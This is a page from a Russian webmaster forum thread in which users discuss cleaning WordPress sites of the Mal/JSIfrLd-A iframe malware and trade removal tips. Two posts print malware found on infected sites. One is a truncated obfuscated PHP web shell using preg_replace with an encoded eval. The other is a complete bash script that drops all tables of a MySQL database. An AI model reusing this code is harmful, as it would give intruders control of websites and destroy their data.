Вредоносный код в wordpress - Mal/JSIfrLd-A

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

16 страниц

< 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 >

Вредоносный код в wordpress - Mal/JSIfrLd-A, Помогите отловить

Опции

Rxp Rxp 26.2.2012, 2:00; Сообщений: 117 Поблагодарили: 21 раз Репутация: 10 Просмотр профиля	26.2.2012, 2:00; Ответить: Rxp Сообщение #102
Участник Группа: User Сообщений: 117 Регистрация: 9.11.2008 Поблагодарили: 21 раз Репутация: 10	(ilikeweb @ 25.2.2012, 22:07) посаны, я смотрю тут собрались специалисты по вредоносным кодам. а никто в вордпрессе у себя не находил код, который редиректит юзеров мобильных телефонов на порнуху? меня с компьютера ни разу не перебрасывало, а юзеры которые заходят через мобилу, жалуются... даже не знаю, где искать код( И такие вирусы найдем и обезвредим! Милости просим! Сообщение отредактировал Rxp - 26.2.2012, 2:02 -------------------- Почистим сайт от вирусов, шеллов и др. -> Топик на серче -> Топик в сапе

xcomx xcomx 26.2.2012, 22:03; Сообщений: 2 Поблагодарили: 1 раз Репутация: 0 Просмотр профиля	26.2.2012, 22:03; Ответить: xcomx Сообщение #103
Новичок Группа: Viewer Сообщений: 2 Регистрация: 15.2.2012 Поблагодарили: 1 раз Репутация: 0	Было заражено 3 проекта на WP. Поискал в теме. там был файл с кодированным кодом. Удалил его. Потом удалил все папки WP и залил заново. Яндекс снял метку вируса. Не стоит код вируса искать везде. Сначало обновите все файлы WP а также плагины на нулевые с офф сайта производителя двига и плагинов. далее если все по старому чистите cache или ищите в upload левые .php , .js файлы и удаляете их. Код можно обнаружить с помощью Веб браузера Google Chrome. Я так и искал. Он видит код на морде сайте. смотрите <iframe если есть и там будет ссылка то вирус сидит дальше. он генерит его постоянно поэтому в коде вы его ненайдете. Удачи. Поблагодарили: (1) Electric

lulul lulul 27.2.2012, 20:36; Сообщений: 4 Поблагодарили: 4 раза Репутация: 1 Просмотр профиля	27.2.2012, 20:36; Ответить: lulul Сообщение #104
Новичок Группа: Viewer Сообщений: 4 Регистрация: 17.2.2012 Поблагодарили: 4 раза Репутация: 1	Обращалась за помощью к Electric, сегодня яндекс проверил сайт, вирус не обнаружен Поблагодарили: (1) Electric

Knebekajze Knebekajze 29.2.2012, 0:51; Сообщений: 3 Поблагодарили: 3 раза Репутация: 1 Просмотр профиля	29.2.2012, 0:51; Ответить: Knebekajze Сообщение #105
Новичок Группа: Viewer Сообщений: 3 Регистрация: 26.2.2012 Поблагодарили: 3 раза Репутация: 1	Большущее СПАСИБО за помощь в избавлении от вирусов товарищу Electric =) Да прибудет с ним Сила! Сейчас Яндекс проверит мои сайты, но я уверенна, что там все будет замечательно=) Поблагодарили: (1) Electric

samdocua samdocua 29.2.2012, 2:38; Сообщений: 97 Поблагодарили: 12 раз Репутация: 1 Просмотр профиля	29.2.2012, 2:38; Ответить: samdocua Сообщение #106
Частый гость Группа: User Сообщений: 97 Регистрация: 8.7.2010 Поблагодарили: 12 раз Репутация: 1	Товарищи, ставьте на все сайты на вордпрессе плагин File Monitor Plus http://wordpress.org/extend/plugins/wordpr...e-monitor-plus/, а также закрывйте доступ по ip к папкам wp-admin, wp-includes. Также почитайте рекомендации по защите блога http://habrahabr.ru/blogs/wordpress/98083/ и не будет проблем с вирусами Поблагодарили: (1) Electric

Electric Electric 29.2.2012, 12:47; Сообщений: 1532 Поблагодарили: 400 раз Репутация: 57 Просмотр профиля	29.2.2012, 12:47; Ответить: Electric Сообщение #107
CMS help/antivirus Группа: Active User Сообщений: 1532 Регистрация: 27.12.2009 Из: Єдина Україна Поблагодарили: 400 раз Репутация: 57	(samdocua @ 29.2.2012, 1:38) ставьте на все сайты на вордпрессе плагин File Monitor Plus Если вирус УЖЕ на сайте - никакие "антивирусные плагины" не помогут. (samdocua @ 29.2.2012, 1:38) Также почитайте рекомендации по защите блога http://habrahabr.ru/blogs/wordpress/98083/ Это не для рядовых пользователей, это для продвинутых... Кстати, вот еще кусок возможного варианта незашифрованого шелла: <?php $auth_pass = ""; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\ -------------------- Чистка от вирусов. Sape. CMS, плагины, моды, темы. НесТ@ндАртнЫе решения. [VK][FB][TW][LJ][G+]

Electric Electric 2.3.2012, 1:04; Сообщений: 1532 Поблагодарили: 400 раз Репутация: 57 Просмотр профиля	2.3.2012, 1:04; Ответить: Electric Сообщение #108
CMS help/antivirus Группа: Active User Сообщений: 1532 Регистрация: 27.12.2009 Из: Єдина Україна Поблагодарили: 400 раз Репутация: 57	На одном из зараженных сайтов была снесена база... более детальный просмотр файлов показал наличие исполняемого вредоносного скрипта: #!/bin/bash test "$1" -a "$2" \|\| { echo "Usage: $0 dbname password"; exit 1; } dbname="$1"; dbpasswd="$2"; mysqldump -u$dbname -p$dbpasswd --add-drop-table --no-data $dbname \| grep ^DROP \| mysql -u$dbname -p$dbpasswd $dbname Кроме того на том сайте нашоделось около десятка различных шеллов и вирусных кодов... -------------------- Чистка от вирусов. Sape. CMS, плагины, моды, темы. НесТ@ндАртнЫе решения. [VK][FB][TW][LJ][G+]

Rxp Rxp 4.3.2012, 11:13; Сообщений: 117 Поблагодарили: 21 раз Репутация: 10 Просмотр профиля	4.3.2012, 11:13; Ответить: Rxp Сообщение #109
Участник Группа: User Сообщений: 117 Регистрация: 9.11.2008 Поблагодарили: 21 раз Репутация: 10	(koninana @ 14.2.2012, 4:35) Привет всем! В блогах вордпресс яндекс нашел Mal/JSIfrLd-A То появляется, то нет, ифрейм 1х1 еле заметный. Поиск по коду внутир файлов на фтп ничего не дал. Ну нет нигде никаких фреймов и такого кода. Наверное вставляется как-то через пхп, но как - не знаю. Инфы в инете не нашел. Помогите пожалуйста отловить. Какие у меня варианты? Стучите в асю (в профиле) поможем удалить вирус! -------------------- Почистим сайт от вирусов, шеллов и др. -> Топик на серче -> Топик в сапе

Electric Electric 4.3.2012, 14:02; Сообщений: 1532 Поблагодарили: 400 раз Репутация: 57 Просмотр профиля	4.3.2012, 14:02; Ответить: Electric Сообщение #110
CMS help/antivirus Группа: Active User Сообщений: 1532 Регистрация: 27.12.2009 Из: Єдина Україна Поблагодарили: 400 раз Репутация: 57	На недавно почищенных сайтах пока без рецедивов. Заметил еще одну ошибку - иногда пароль и логин от ФТП записуют в конфиг файл... а поскольку у некоторых хостеров логины и пароли на ФТП такие же как и в панели хостинга, то ничего не стоит сломать все сайты на аккаунте. Будьте осторожны, не допускайте такой ошибки. -------------------- Чистка от вирусов. Sape. CMS, плагины, моды, темы. НесТ@ндАртнЫе решения. [VK][FB][TW][LJ][G+]

Барбариска Барбариска 5.3.2012, 9:03; Сообщений: 25 Поблагодарили: 2 раза Репутация: 1 Просмотр профиля	5.3.2012, 9:03; Ответить: Барбариска Сообщение #111
Новичок Группа: User Сообщений: 25 Регистрация: 15.2.2012 Поблагодарили: 2 раза Репутация: 1	Есть такая проблема с вирусом. Был на сайте вирус (собственно, может, и есть, он периодически появляется, но не в этом дело). Жил вирус в папках /wp-admin/network/atm/abmlouygtip/number/index.htm, /wp-admin/network/atm/afuyrrbjooit/number/index.htm и еще множестве аналогичных. Папки все эти я снесла. Но... но теперь в статистике накапливается большое кол-во ошибок 404 из-за вот этих не найденных папок. В результате растет напряг на хостинг. Никто с таким не сталкивался? Я пыталась искать по файлам всего сайта запросы на afuyrrbjooit, abmlouygtip..., но ничего не находится. Попалась одна ссылка на atm и все.

« Предыдущая тема · Программная часть · Следующая тема »

16 страниц

< 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 >

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Продам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка.	19	Boymaster	11403	20.4.2024, 0:01 автор: Boymaster
Нужен кодер, чтобы пофиксить ошибку Wordpress после переноса сайта	0	Alex-777	946	7.4.2024, 18:05 автор: Alex-777
Перенос сайта на CMS Wordpress	8	freeax	4981	10.3.2024, 14:58 автор: freeax
Как настроить в WordPress для SEO оптимизации	8	rownong27	2486	2.3.2024, 12:59 автор: toplinks
Восстановление сайтов из Вебархива на Wordpress.	39	freeax	32797	14.2.2024, 14:32 автор: freeax

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 25.4.2024, 4:48

Дизайн